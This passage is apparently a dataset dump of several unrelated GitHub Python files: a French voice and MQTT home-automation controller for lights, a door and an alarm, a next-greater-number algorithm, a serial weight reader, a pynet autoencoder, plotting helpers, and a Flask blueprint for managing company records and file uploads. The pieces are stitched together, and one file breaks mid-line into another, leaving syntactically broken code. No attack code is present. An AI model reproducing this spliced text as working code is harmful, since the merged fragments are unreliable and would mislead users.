\"\":\n pass\n else:\n try:\n (modele, score) = process.extractOne(text, phrases)\n print(modele, score)\n if score >= 89:\n if modele in {\"quelle heure est-il?\",\n \"il est quelle heure?\",\n \"quelle heure il est?\"}:\n clockwork()\n print(\"sys_vox heure\")\n \n elif modele in {\"quel temps fait-il?\",\n \"quel est la température?\",\n \"quel est la météo?\",\n \"quelle temperature fait-il?\",\n \"quelles sont les prévision météo?\"}:\n meteo_vox()\n print(\"sys_vox meteo\")\n \n elif modele in {\"ouvrir la lumière de l'entrer\",\n \"ouvre la lumière de l'entrer\",\n \"ouvre la lumière d'entrer\",\n \"allumer la lumière de l'entrer\"}:\n publicate(channel_gpio, \"lumiere1_ON\")\n mong.push(\"lumiere1\", \"ON\")\n compute(\"allumage lumière de l'entrer\")\n print(\"sys_vox lumiere entree on\")\n \n elif modele in {\"fermer la lumière de l'entrer\",\n \"ferme la lumière de l'entrer\",\n \"eteindre la lumière de l'entrer\"}:\n publicate(channel_gpio,\"lumiere1_OFF\")\n mong.push(\"lumiere1\",\"OFF\")\n compute(\"fermeture lumière de l'entrer\")\n print(\"sys_vox lumiere entre off\")\n \n elif modele in {\"ouvrir la porte\",\n \"ouvre la porte\",\n \"ouverture de la porte\"}:\n publicate(channel_gpio, \"porte_ON\")\n mong.push(\"porte\", \"OUVERTURE\")\n compute(\"ouverture porte\")\n print(\"sys_vox porte ouverture\")\n \n elif modele in {\"fermer la porte\",\n \"ferme la porte\",\n \"fermeture de la porte\"}:\n publicate(channel_gpio, \"porte_OFF\")\n mong.push(\"porte\", \"FERMETURE\")\n compute(\"fermeture porte\")\n print(\"sys_vox porte fermeture\")\n \n elif modele in {\"ouvrir la lumière du salon\",\n \"ouvre la lumière du salon\",\n \"allumer la lumière du salon\"}:\n publicate(channel_gpio,\"lumiere2_ON\")\n mong.push(\"lumiere2\", \"ON\")\n compute(\"allumage lumière du salon\")\n print(\"sys_vox lumiere salon, allumage\")\n \n elif modele in {\"fermer la lumière du salon\",\n \"ferme la lumière du salon\",\n \"eteindre la lumière du salon\"}:\n publicate(channel_gpio,\"lumiere2_OFF\")\n mong.push(\"lumiere2\", \"OFF\")\n compute(\"fermeture lumière du salon\")\n print(\"sys_vox lumiere salon off\")\n \n elif modele in {\"ouvrir la porte\",\n \"ouvre la porte\",\n \"ouverture de la porte\"}:\n publicate(channel_gpio, \"porte_ON\")\n mong.push(\"porte\", \"OUVERTURE\")\n compute(\"ouverture porte\")\n print(\"sys_vox porte ouverture\")\n \n elif modele in {\"fermer la porte\",\n \"ferme la porte\",\n \"fermeture de la porte\"}:\n publicate(channel_gpio, \"porte_OFF\")\n mong.push(\"porte\", \"FERMETURE\")\n compute(\"fermeture porte\")\n print(\"sys_vox porte fermeture\")\n \n elif modele in {\"fermer le système d'alarme\",\n \"ferme le système d'alarme\",\n \"éteindre le système d'alarme\",\n \"arreter le système d'alarme\",\n \"désarmer le système d'alarme\"}:\n publicate(channel_gpio,\"alarme_OFF\")\n mong.push(\"alarme\",\"DISARMED\")\n compute(\"désactivation systeme d'alarme\")\n print(\"sys_vox alarm off\")\n \n elif modele in {\"allumer le système d'alarme\",\n \"ouvrir le système d'alarme\",\n \"ouvre le système d'alarme\",\n \"démarrer le système d'alarme\",\n \"armer le système d'alarme\"}:\n publicate(channel_gpio,\"alarme_ON\")\n mong.push(\"alarme\",\"ARMED\")\n compute(\"activation systeme d'alarme\")\n print(\"sys_vox alarm on\")\n else:\n print(\"cant associate model\")\n else:\n no_compute()\n print(\"score<90\")\n except:\n no_compute()\n print(\"cant extract model\")\n\n# fonction de recuperation et vocalisation du temps\ndef clockwork():\n time = datetime.datetime.now()\n time = time.strftime(\"%H:%M\")\n h,m = time.split(\":\")\n tts.say(f\"il est {h} heures {m} minutes\")\n print(f\"il est {h} heures {m} minutes\")\n\n# fonction de recuperation et vocalisation de la meteo\ndef meteo_vox():\n txtMeteo = \"la Temperature est de \" + str(meteo.temperature('celsius')['temp']) + \"celsiusse et le temps est \" + meteo.detailed_status\n print(txtMeteo)\n tts.say(txtMeteo)\n \n# fonction de vocalisation d'un message \ndef compute(msg):\n tts.say(msg)\n print(msg)\n \n# fonction de vocalisation d'un message d'erreur \ndef no_compute():\n tts.say(u\"la commande n'est pas clair, pouvez vous répété\")\n print(\"la commande n'est pas clair, pouvez vous répété\")\n\n\n\n\n#SYSTEME MQTT\n# fonction de recuperation et d'association de message publier sur mqtt\ndef on_message(client, userdata, message):\n print(\"on_msg received message: \" ,str(message.payload.decode(\"utf-8\")))\n \n event=str(message.payload.decode(\"utf-8\"))\n global etat_lum1\n global etat_lum2 \n global etat_alarm\n global etat_porte\n # reception et declenchement des pin du gpio par le systeme GUI ou VOX \n if \"lumiere1_ON\" in event:\n print(\"mqtt_onmsg_checked lumiere1 on!\") \n GPIO.output(pin_lum1, GPIO.HIGH)\n elif \"lumiere1_OFF\" in event:\n print(\"mqtt_onmsg_checked lumiere1 off!\") \n GPIO.output(pin_lum1, GPIO.LOW) \n elif \"lumiere2_ON\" in event:\n print(\"mqtt_onmsg_checked lumiere 2 on!\") \n GPIO.output(pin_lum2, GPIO.HIGH)\n elif \"lumiere2_OFF\" in event:\n print(\"mqtt_onmsg_checked lumiere 2 off!\") \n GPIO.output(pin_lum2, GPIO.LOW)\n elif \"alarme_ON\" in event:\n print(\"mqtt_onmsg_checked alarme on!\") \n GPIO.output(pin_alarm, GPIO.HIGH)\n elif \"alarme_OFF\" in event:\n print(\"mqtt_onmsg_checked alarme off!\") \n GPIO.output(pin_alarm, GPIO.LOW)\n elif \"porte_ON\" in event:\n print(\"mqtt_onmsg_checked porte on!\") \n GPIO.output(pin_porte, GPIO.HIGH)\n elif \"porte_OFF\" in event:\n print(\"mqtt_onmsg_checked porte off!\") \n GPIO.output(pin_porte, GPIO.LOW)\n \n # reception et declenchement de l'affichage declencher par gpio\n elif \"lumière d'entrer on\"in event:\n etat_lum1 = \"ON\"\n l1_etat.config(text= etat_lum1, fg = \"green\")\n print(\"mqtt_onmsg_checked pin_lum1-on\")\n elif \"lumière d'entrer off\"in event:\n etat_lum1 = \"OFF\"\n l1_etat.config(text= etat_lum1, fg = \"red\")\n print(\"mqtt_onmsg_checked pin_lum1-off\")\n elif \"lumière du salon on\"in event:\n etat_lum2 = \"ON\"\n l2_etat.config(text= etat_lum2, fg = \"green\")\n print(\"mqtt_onmsg_checked pin_lum2-on\")\n elif \"lumière du salon off\"in event:\n etat_lum2 = \"OFF\"\n l2_etat.config(text= etat_lum2, fg = \"red\")\n print(\"mqtt_onmsg_checked pin_lum2-off\")\n elif \"alarme on\"in event:\n etat_alarm = \"ARMED\"\n l3_etat.config(text= etat_alarm, fg = \"red\")\n print(\"mqtt_onmsg_checked pin_alarm-on\")\n elif \"alarme off\"in event:\n etat_alarm = \"DISARMED\"\n l3_etat.config(text= etat_alarm, fg = \"green\")\n print(\"mqtt_onmsg_checked pin_alarm-off\")\n elif \"porte on\"in event:\n etat_porte = \"OPEN\"\n porte_etat.config(text= etat_porte)\n print(\"mqtt_onmsg_checked porte on\")\n elif \"porte off\"in event:\n etat_porte = \"CLOSE\"\n porte_etat.config(text= etat_porte)\n print(\"mqtt_onmsg_checked porte off\")\n \n\n# fonction de publication de message sur mqtt\ndef publicate(channel, msg):\n client.publish(channel, msg)\n print(f\"publicate: {msg} on {channel}\")\n\n# fonction d'ecoute et de publication du gpio sur mqtt \ndef gpio_listen(pin, channel, msg):\n msg_original = msg\n print(f\"gpio_listen {pin} start\")\n while running:\n gpio_read_1 = GPIO.input(pin)\n sleep(0.2)\n gpio_read_2 = GPIO.input(pin)\n if gpio_read_1 != gpio_read_2:\n print(f\"gpio_listen {pin} read change\")\n if GPIO.input(pin):\n print(\"gpio_on\")\n msgvox = f\"{msg}, ouverte\"\n msg = str(msg+\" on\")\n publicate(channel, msg)\n sleep(1.4)\n tts.say(msgvox)\n if not GPIO.input(pin):\n print(\"gpio_OFF\")\n msgvox = f\"{msg}, fermer\"\n msg = str(msg+\" off\")\n publicate(channel, msg)\n sleep(1.4)\n tts.say(msgvox)\n msg = msg_original\n #print(etat_lum1) \n print(f\"gpio_listen {pin} out\")\n\n\n\n\n#SYSTEME GUI \n# fonction de commande associer au bouton commande vocale\ndef commande_vocal():\n listening()\n analyze()\n\n# fonction de commande associer au bouton lumiere1 on\ndef lumiere1_ON():\n mong.push(\"lumiere1\", \"ON\")\n publicate(channel_gpio, \"lumiere1_ON\")\n compute(\"allumage lumière de l'entrer\")\n\n# fonction de commande associer au bouton lumiere1 off\ndef lumiere1_OFF():\n mong.push(\"lumiere1\",\"OFF\")\n publicate(channel_gpio, \"lumiere1_OFF\")\n compute(\"fermeture lumière de l'entrer\")\n\n# fonction de commande associer au bouton lumiere2 on\ndef lumiere2_ON():\n mong.push(\"lumiere2\", \"ON\")\n publicate(channel_gpio, \"lumiere2_ON\")\n compute(\"allumage lumière du salon\")\n\n\n# fonction de commande associer au bouton lumiere2 off\ndef lumiere2_OFF():\n mong.push(\"lumiere2\",\"OFF\")\n publicate(channel_gpio, \"lumiere2_OFF\")\n compute(\"fermeture lumière du salon\")\n\n# fonction de commande associer au bouton alarme armed\ndef alarme_ON():\n mong.push(\"alarme\",\"ARMED\")\n publicate(channel_gpio, \"alarme_ON\")\n compute(\"activation système d'alarme\")\n\n# fonction de commande associer au bouton alarme disarmed\ndef alarme_OFF():\n mong.push(\"alarme\",\"DISARMED\")\n publicate(channel_gpio, \"alarme_OFF\")\n compute(\"désactivation système d'alarme\")\n \n# fonction de commande associer au bouton porte open \ndef porte_ON():\n publicate(channel_gpio, \"porte_ON\")\n mong.push(\"porte\", \"OUVERTURE\")\n compute(\"ouverture porte\")\n \n# fonction de commande associer au bouton porte close \ndef porte_OFF():\n mong.push(\"porte\", \"FERMETURE\")\n publicate(channel_gpio, \"porte_OFF\")\n compute(\"fermeture porte\")\n\n# fonction de commande associer au bouton historique et affichage du log mongodb\ndef historique():\n global resultat\n global f1\n f1 = Tk()\n f1.title(\"Historique\")\n f1.geometry(\"400x450\")\n\n resultat = Text(f1)\n resultat.config(width=60, height=23)\n resultat.insert(INSERT, \"\")\n resultat.grid(row=2, column=0, columnspan=4)\n\n bouton = Button(f1, text=\"Quitter\", command=f1.destroy)\n bouton.grid(row=10, column=2)\n \n bouton1 = Button(f1, text=\"Actualiser\", command=actualiser)\n bouton1.grid(row=10, column=0)\n resultat.insert(INSERT, mon.retrieve(20))\n \n f1.mainloop()\n\n# fonction de commande associer au bouton actualiser de la fenetre historique\n# et actualisation du log mongodb \ndef actualiser():\n resultat.delete(\"1.0\",\"end\")\n resultat.insert(INSERT, mon.retrieve(20))\n\n# fonction de commande associer au bouton quitter et fermeture(x) de la fenetre\ndef destroy():\n global running\n print(\"Quitter proprement\")\n running = False\n client.loop_stop()\n client.disconnect()\n f.destroy()\n try:\n f1.destroy()\n except:\n pass\n\n#bloc-config de la fonction affichage horloge \ndef clockTime():\n now = datetime.datetime.now()\n t = now.strftime(\" %A %-d %B \\n %H:%M:%S\")\n affiche_heure.config(text = t)\n affiche_heure.after(1000, clockTime)\n\n#bloc-config de la fonction affichage meteo \ndef getMeteo():\n global txtMeteo\n imageMeteo = f\"http://openweathermap.org/img/wn/{meteo.weather_icon_name}.png\"\n response = requests.get(imageMeteo)\n file = open(\"meteo_image.png\", \"wb\")\n file.write(response.content)\n file.close()\n img = ImageTk.PhotoImage(IMG.open(\"meteo_image.png\"))\n affiche_image.configure(image=img)\n affiche_image.image = img\n txtMeteo = \"Temperature: \" + str(meteo.temperature('celsius')['temp']) + \" celsius\" + \"\\n\" + meteo.detailed_status\n affiche_meteo.config(text = txtMeteo)\n affiche_meteo.after(5000, getMeteo) \n return txtMeteo\n\n\n\n# activation du protocole mqtt\nclient.loop_start()\n\nclient.subscribe(channel_gpio)\nclient.on_message=on_message\n\n# activation du des thread parallele pour l= 1 and digits[end_index] <= digits[end_index - 1]:\n end_index -= 1\n if end_index != 0:\n found_index = end_index - 1\n for j in range(len(digits)-1,found_index,-1):\n if digits[j] > digits[found_index]:\n digits[found_index] , digits[j] = digits[j], digits[found_index]\n break\n\n else:\n return 'Next number not possible'\n\n return ''.join(reverse(digits,end_index))\n\n\ndef reverse(number,index):\n start = index\n end = len(number) - 1\n while start < end:\n number[start], number[end] = number[end], number[start]\n start += 1\n end -= 1\n return number\n\n\nprint(find_next_greatest(1993))\n\n\n\n\n","repo_name":"dhruvarora93/Algorithm-Questions","sub_path":"Array Problems/find_next_greatest.py","file_name":"find_next_greatest.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"31697719794","text":"import serial\n\nSerial_port = 'COM9'\nSerial_rate = 57600\n\ndata_list = []\nsummation = []\n\ncount = 0\nsum_of_four = 0\n\n\nser = serial.Serial(Serial_port, Serial_rate)\nwhile True:\n \n reading = ser.readline().decode('utf-8').strip('\\n')\n if(reading =='***********************yeniden kalibre ediliyor...****************************\\r'):\n print('***********************yeniden kalibre ediliyor...****************************\\r')\n continue\n count += 1\n data_list.append(float(reading))\n sum_of_four += float(reading)\n \n if(count % 4 == 0): \n summation.append(sum_of_four)\n if(10 > sum_of_four > -10 ):\n print('0')\n else:\n print(int(sum_of_four)) #total weight\n count = 0\n sum_of_four = 0\n","repo_name":"hasantskn/Internship-Projects","sub_path":"Dort_sensor_toplam.py","file_name":"Dort_sensor_toplam.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"35779272849","text":"\n\nfrom jobman import DD, expand, flatten\n\nimport pynet.layer as layer\nfrom pynet.model import *\nfrom pynet.layer import *\nimport pynet.datasets.i2r as i2r\nimport pynet.learning_method as learning_methods\nfrom pynet.learning_rule import LearningRule\nfrom pynet.log import Log\nfrom pynet.train_object import TrainObject\nfrom pynet.cost import Cost\nimport pynet.datasets.preprocessor as preproc\nimport pynet.layer_noise as layer_noise\n\nimport cPickle\nimport os\n\nfrom hps.models.model import AE\n\nimport theano\nfrom theano.sandbox.cuda.var import CudaNdarraySharedVariable\nfloatX = theano.config.floatX\n\n\nclass I2R_AE(AE):\n\n def __init__(self, state):\n self.state = state\n\n def run(self):\n dataset = self.build_dataset()\n # import pdb\n # pdb.set_trace()\n learning_rule = self.build_learning_rule()\n model = self.build_model(dataset)\n learn_method = self.build_learning_method()\n database = self.build_database(dataset, learning_rule, learn_method, model)\n log = self.build_log(database)\n train_obj = TrainObject(log = log,\n dataset = dataset,\n learning_rule = learning_rule,\n learning_method = learn_method,\n model = model)\n train_obj.run()\n # log.info(\"fine tuning\")\n # for layer in train_obj.model.layers:\n # layer.dropout_below = None\n # layer.noise = None\n # train_obj.setup()\n # train_obj.run()\n\n\n\n\n\n\n\n def build_layer(self, dataset, layer_name):\n\n output_noise = None if layer_name.layer_noise.type is None else \\\n getattr(layer_noise, layer_name.layer_noise.type)()\n if layer_name.layer_noise.type in ['BlackOut', 'MaskOut', 'BatchOut']:\n output_noise.ratio = layer_name.layer_noise.ratio\n\n elif layer_name.layer_noise.type is 'Gaussian':\n output_noise.std = layer_name.layer_noise.std\n output_noise.mean = layer_name.layer_noise.mean\n\n output = getattr(layer, layer_name.type)(dim=layer_name.dim,\n name=layer_name.name,\n dropout_below=layer_name.dropout_below,\n noise=output_noise)\n return output\n\n def build_database(self, dataset, learning_rule, learning_method, model):\n database = super(I2R_AE, self).build_database(dataset, learning_rule, learning_method, model)\n if self.state.dataset.dataset_noise.type == 'Gaussian':\n database['records']['dataset_noise_std'] = dataset.noise.std\n X_max = np.argmax(dataset.get_test().X, axis=1).astype(floatX)\n y_max = np.argmax(dataset.get_test().y, axis=1).astype(floatX)\n\n mean_error = np.mean(y_max != X_max)\n database['records']['Noisy_Test_Error_Rate'] = mean_error\n return database\n\n\n\n def build_model(self, dataset):\n model = MLP(input_dim=dataset.feature_size(), rand_seed=self.state.model.rand_seed)\n hidden1 = self.build_layer(dataset, self.state.hidden1)\n hidden2 = self.build_layer(dataset, self.state.hidden2)\n output = self.build_layer(dataset, self.state.output)\n # model.add_layer(hidden1)\n # model.add_layer(hidden2)\n model.add_layer(output)\n return model\n","repo_name":"hycis/Pynet","sub_path":"hps/models/I2R_AE.py","file_name":"I2R_AE.py","file_ext":"py","file_size_in_byte":3446,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"95"} +{"seq_id":"74271352953","text":"from datetime import datetime\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport itertools\n\n\n# set font\nplt.rcParams['font.family'] = 'sans-serif'\nplt.rcParams['font.sans-serif'] = 'Helvetica'\n\n# set the style of the axes and the text color\nplt.rcParams['axes.edgecolor']='#333F4B'\nplt.rcParams['axes.linewidth']=0.8\nplt.rcParams['xtick.color']='#333F4B'\nplt.rcParams['ytick.color']='#333F4B'\nplt.rcParams['text.color']='#333F4B'\n\n\ndef plot_word_counter(word_counter, top_n=100, save_fig=False):\n frequencies = [f for (w, f) in word_counter.most_common(top_n)]\n words = [w for (w, f) in word_counter.most_common(top_n)]\n words_idx = [i for i, (w, f) in enumerate(word_counter.most_common(top_n))]\n\n \n fig, ax = plt.subplots(figsize=(20, 8))\n\n # plt.vlines(x=words_idx, ymin=0, ymax=frequencies, color='#9E3D61', alpha=0.2, linewidth=15) # 007ACC\n # plt.plot(words_idx, frequencies, \"s\", markersize=15, color='#970137', alpha=0.6) # 007ACC \n ax.bar(words_idx, frequencies, alpha=0.8, color='#970137', linewidth=15)\n\n\n # set labels\n ax.set_ylabel('Fréquence d\\'apparition du mot', fontsize=15, \n fontweight='black', color='#333F4B')\n ax.set_xlabel('')\n ax.set_title('')\n\n # set axis\n plt.xticks([])\n\n # plt.xticks(words_idx, words)\n # ax.tick_params(axis='both', which='major', labelsize=12)\n # plt.xticks(rotation=70, ha='center')\n\n # change the style of the axis spines\n ax.spines['top'].set_color('none')\n ax.spines['right'].set_color('none')\n\n # set the spines position\n ax.spines['left'].set_position(('axes', 0.015))\n plt.yscale('log')\n \n # Add labels at the top of the bar\n for idx, f, w in zip(words_idx, frequencies, words):\n\n label = \"{}\".format(w) \n plt.annotate(label, # this is the text\n (idx, f), # this is the point to label\n textcoords=\"offset points\", # how to position the text\n xytext=(0,20), # distance from text to points (x,y)\n ha='center', # horizontal alignment can be left, right or center\n rotation=90, \n fontsize=15, \n weight='bold') \n \n label = \"{:.0f}\".format(f) \n plt.annotate(label, (idx, f), textcoords=\"offset points\", \n xytext=(1, -40 - len(label)), ha='center',\n rotation=90, fontsize=15, weight='bold', color='white') \n \n if save_fig:\n now = datetime.now()\n time_stamp = now.strftime(\"%d_%m_%Y__%H_%M_%S\")\n plt.savefig('./counter_{}.png'.format(time_stamp), dpi=300, bbox_inches='tight')\n \n plt.show();\n \n \ndef plot_zipf(counter, save_fig=False):\n frequencies = [f for (w, f) in counter.most_common(len(counter))]\n words = [w for (w, f) in counter.most_common(len(counter))]\n words_idx = [i for i, (w, f) in enumerate(counter.most_common(len(counter)))]\n\n fig, ax = plt.subplots(figsize=(10, 10))\n \n # Add labels word examples\n log_range = [int(f) for f in np.logspace(0, 4, 10)] \n log_range[-1] = -100\n for i in log_range:\n\n label = \"{}\".format(words[i]) \n plt.annotate(label, (words_idx[i], frequencies[i]), \n textcoords=\"offset points\", xytext=(20,20), \n ha='center', rotation=0, fontsize=15, fontweight='black') \n\n ax.set_xlabel('Rang des mots', fontsize=15)\n ax.set_ylabel('Fréquence d\\'apparition des mots', fontsize=15)\n\n plt.plot(words_idx, frequencies, \"o\", markersize=5, color='#970137', alpha=0.3)\n plt.yscale('log')\n plt.xscale('log')\n ax.grid(True)\n \n if save_fig:\n now = datetime.now()\n time_stamp = now.strftime(\"%d_%m_%Y__%H_%M_%S\")\n plt.savefig('./zipf_{}.png'.format(time_stamp), dpi=300, bbox_inches='tight')\n \n plt.show();\n\n\n# Matrice de confusion\n\ndef plot_confusion_matrix(cm, classes,\n normalize=False,\n title='Confusion matrix',\n cmap=plt.cm.Blues):\n \"\"\"\n This function prints and plots the confusion matrix.\n Normalization can be applied by setting `normalize=True`.\n \"\"\"\n plt.figure(figsize=(5, 5))\n if normalize:\n cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\n print(\"Normalized confusion matrix\")\n else:\n print('Confusion matrix, without normalization')\n\n # print(cm)\n\n plt.imshow(cm, interpolation='nearest', cmap=cmap)\n plt.title(title)\n plt.colorbar()\n tick_marks = np.arange(len(classes))\n plt.xticks(tick_marks, classes, rotation=45)\n plt.yticks(tick_marks, classes)\n\n fmt = '.2f' if normalize else 'd'\n thresh = cm.max() / 2.\n for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\n plt.text(j, i, format(cm[i, j], fmt),\n horizontalalignment=\"center\",\n color=\"white\" if cm[i, j] > thresh else \"black\")\n\n plt.tight_layout()\n plt.ylabel('True label')\n plt.xlabel('Predicted label')\n\n plt.show();\n","repo_name":"AntoineSimoulin/m2-data-sciences","sub_path":"src/plots.py","file_name":"plots.py","file_ext":"py","file_size_in_byte":5158,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"95"} +{"seq_id":"72554907831","text":"from flask import Blueprint, render_template, jsonify, redirect, request\nfrom flask import send_from_directory\n\nimport sys\nfrom openpyxl import Workbook\n\nsys.path.append(\"..\")\nfrom db import db\nfrom .models.companyInfo import *\nfrom .export import export\nfrom .update import update\nfrom user.models.userInfo import *\nfrom .models.fileInfo import *\n\nimport os\nimport _thread\nimport datetime, uuid\n\nfrom flask import make_response\n\nimport json\n\ncompany = Blueprint('company', __name__)\n\nALLOWED_EXTENSIONS = set(['txt', 'png', 'jpg', 'xls', 'xlsx', 'JPG', 'PNG', 'gif', 'GIF', 'doc', 'docx'])\n\n\n# 用于判断文件后缀\ndef allowe_file(filename):\n '''\n 限制上传的文件格式\n :param filename:\n :return:\n '''\n return '.' in filename and filename.rsplit('.', 1)[1] in ALLOWED_EXTENSIONS\n\n\ndef change_filename(filename):\n '''\n 修改文件名称\n :param filename:\n :return:\n '''\n fileinfo = os.path.splitext(filename)\n filename = datetime.datetime.now().strftime(\"%Y%m%d%H%M%S\") + str(uuid.uuid1().hex) + fileinfo[-1]\n return filename\n\n\n@company.route('/home')\ndef index():\n return render_template('company/home.html')\n\n\n@company.route('/show', methods=['GET', 'POST'])\ndef show():\n # print(request.get_data())\n # print(\"###################\")\n a = request.get_data() # 得到JavaScript发送的字符串流\n # print(type(a)) # bytes\n s1 = str(a, encoding='utf-8') # 解码为string\n # print(type(s1))\n # print(s1)\n dict1 = json.loads(s1) # 将string变成dict\n\n # data = json.loads(request.get_data('data'))\n pageNum = dict1['pagenum']\n companyName = dict1['companyName']\n storeName = dict1['storeName']\n bianhao = dict1['bianhao']\n belongTo = dict1['belongTo']\n startTime = dict1['startTime']\n endTime = dict1['endTime']\n\n userId = \"\"\n if belongTo != None and belongTo != \"\":\n userInfo = UserInfo.query.filter(UserInfo.realname.like(\"%\" + belongTo + \"%\")).first()\n userId = userInfo.id\n\n print(\"===================userId:{}\".format(userId))\n\n # print(page)\n # 分页查询, 每页3个, 查询第2页的数据\n pn = CompanyInfo.query.filter(\n CompanyInfo.companyName.like(\"%\" + companyName + \"%\") if companyName is not None and companyName != \"\" else str(\n \"\"),\n CompanyInfo.storeName.like(\"%\" + storeName + \"%\") if storeName is not None and storeName != \"\" else str(\"\"),\n CompanyInfo.customBianHao.like(\"%\" + bianhao + \"%\") if bianhao is not None and bianhao != \"\" else str(\"\"),\n CompanyInfo.belongTo == userId if userId is not None and userId != \"\" else \"\",\n CompanyInfo.updatetime.between(startTime,\n endTime) if startTime is not None and startTime != \"\" and endTime is not None and endTime != \"\" else str(\n \"\"),\n CompanyInfo.updatetime > startTime if startTime is not None and startTime != \"\" and (\n endTime is None or endTime == \"\") else \"\"\n ).order_by(CompanyInfo.id.desc()).paginate(page=pageNum, per_page=50)\n # pn.items\n # # 获取该页的数据\n # pn.page\n # # 获取当前的页码\n # pn.pages\n # 获取总页数\n dict = {}\n\n dict[\"errCode\"] = 200\n dict[\"errMessage\"] = \"请刷新页面重新试一次\"\n\n cis = CompanyInfoScheme(many=True)\n result = cis.dump(pn.items)\n dict[\"info\"] = result\n dict[\"totalNumberPage\"] = pn.pages\n return jsonify(dict)\n\n@company.route('/fileshow', methods=['GET', 'POST'])\ndef fileShow():\n\n a = request.get_data() # 得到JavaScript发送的字符串流\n\n s1 = str(a, encoding='utf-8') # 解码为string\n\n dict1 = json.loads(s1) # 将string变成dict\n\n # data = json.loads(request.get_data('data'))\n pageNum = dict1['pagenum']\n searchName = dict1['searchName']\n belongTo = dict1['belongTo']\n startTime = dict1['startTime']\n endTime = dict1['endTime']\n\n userId = \"\"\n if belongTo != None and belongTo != \"\":\n userInfo = UserInfo.query.filter(UserInfo.realname.like(\"%\" + belongTo + \"%\")).first()\n userId = userInfo.id\n\n print(\"===================userId:{}\".format(userId))\n\n # print(page)\n # 分页查询, 每页3个, 查询第2页的数据\n pn = FileInfo.query.filter(\n FileInfo.name.like(\"%\" + searchName + \"%\") if searchName is not None and searchName != \"\" else str(\"\"),\n FileInfo.belongTo == userId if userId is not None and userId != \"\" else \"\",\n FileInfo.updatetime.between(startTime,\n endTime) if startTime is not None and startTime != \"\" and endTime is not None and endTime != \"\" else str(\n \"\"),\n FileInfo.updatetime > startTime if startTime is not None and startTime != \"\" and (\n endTime is None or endTime == \"\") else \"\"\n ).order_by(FileInfo.id.desc()).paginate(page=pageNum, per_page=20)\n # pn.items\n # # 获取该页的数据\n # pn.page\n # # 获取当前的页码\n # pn.pages\n # 获取总页数\n dict = {}\n\n dict[\"errCode\"] = 200\n dict[\"errMessage\"] = \"请刷新页面重新试一次\"\n\n cis = FileInfoScheme(many=True)\n # print(\"===================cis:{}\".format(len(pn.items)))\n result = cis.dump(pn.items)\n dict[\"info\"] = result\n dict[\"totalNumberPage\"] = pn.pages\n return jsonify(dict)\n\n\n\n@company.route('/getComById', methods=['GET', 'POST'])\ndef getComById():\n a = request.get_data() # 得到JavaScript发送的字符串流\n\n s1 = str(a, encoding='utf-8') # 解码为string\n\n dict1 = json.loads(s1) # 将string变成dict\n idn = int(dict1['id'])\n # print(type(idn))\n # print(idn)\n cif = CompanyInfo.query.filter_by(id=idn).first()\n\n # summary_schema = UserSchema(only=('name', 'email'))\n # summary_schema.dump(user).data\n # {\"name\": \"Monty Python\", \"email\": \"monty@python.org\"}\n\n cis = CompanyInfoScheme()\n result = cis.dump(cif)\n return jsonify(result)\n\n\n@company.route('/download', methods=['GET', 'POST'])\ndef download():\n print(\"在下载函数里执行了\")\n\n id = request.form.get('id')\n fileInformation = FileInfo.query.filter(FileInfo.id == id).first()\n name=fileInformation.quchongFile\n\n # return jsonify({\"描述\":\"出错了\"})\n target_path = \"upload\"\n FilePath = os.path.join(target_path, name)\n if(os.path.exists(FilePath)):\n return send_from_directory(target_path, name, as_attachment=True)\n else:\n return jsonify([\"您下载的文件不存在,已经被删除了!\"])\n # file_name = \"工作簿1.xlsx\"\n # response = make_response(send_from_directory(target_path, \"工作簿1.xlsx\", as_attachment=True))\n # response.headers[\"Content-Disposition\"] = \"attachment; filename={}\".format(file_name)\n # return response\n\n\n@company.route('/uploadhtml', methods=['GET', 'POST'])\ndef uploadHtml():\n return render_template('upload/upload.html')\n\n\ndef saveCompany(companyListNotInDB, target_path, realfilename):\n # 创建一个工作薄\n wb = Workbook()\n\n # 创建一个工作表(注意是一个属性) # 激活 worksheet\n table = wb.active\n\n # excel创建的工作表名默认为sheet1,一下代码实现了给新创建的工作表创建一个新的名字\n table.title = 'Sheet1'\n\n i = 0\n for rowele in companyListNotInDB:\n i = i + 1\n j = 0\n for ele in rowele:\n j = j + 1\n table.cell(row=i, column=j, value=ele)\n\n # 日期\n now_time = datetime.datetime.now().strftime('%Y-%m-%d %H-%M-%S')\n haveRead = \"读取了\";\n excelName = \"{}-{}-{}-{}条.xlsx\".format(realfilename, now_time, haveRead, len(companyListNotInDB))\n # FilePath = target_path + \"/\" + excelName\n FilePath = os.path.join(target_path, excelName)\n if (delFile(FilePath)):\n wb.save(FilePath)\n print(\"保存文件成功:{},数据条数:{}\".format(FilePath, len(companyListNotInDB)))\n return {\"flag\": True, \"path\": excelName}\n\ndef delFile(file):\n\n try:\n # 判断文件是否存在\n if (os.path.exists(file)):\n os.remove(file)\n # print('移除文件:%s' % file)\n # else:\n # print(\"无相同文件不用删除!\")\n return True\n except Exception as e:\n print('文件{}删除错误,可能文件被打开了,请关闭重试!'.format(file))\n return False\n\n@company.route('/reupdate', methods=['GET', 'POST'])\ndef reupdate():\n\n a = request.get_data() # 得到JavaScript发送的字符串��\n\n s1 = str(a, encoding='utf-8') # 解码为string\n\n dict1 = json.loads(s1) # 将string变成dict\n idn = int(dict1['id'])\n\n fileInformation = FileInfo.query.filter(FileInfo.id == idn).first()\n name = fileInformation.changeName\n realfilename = fileInformation.name\n lineNumber = fileInformation.lineNumber\n start = 2\n if lineNumber!= None and lineNumber!=\"\" and lineNumber!=\"null\":\n start = lineNumber\n\n end = -1\n savePath = \"upload\"\n sheetName = \"\"\n isUseNewUser = 1\n isquchong = 1\n # reUpdateCompany(idn, start, end, savePath, name, sheetName, isUseNewUser, isquchong, realfilename)\n _thread.start_new_thread(reUpdateCompany, (idn, start, end, savePath, name, sheetName, isUseNewUser, isquchong, realfilename))\n\n return jsonify({\"flag\":1})\n\n\ndef reUpdateCompany(insertId,start,end,savePath,filename,sheetName,isUseNewUser,isquchong,realfilename):\n\n filePath = os.path.join(savePath, filename)\n if sheetName == \"\":\n 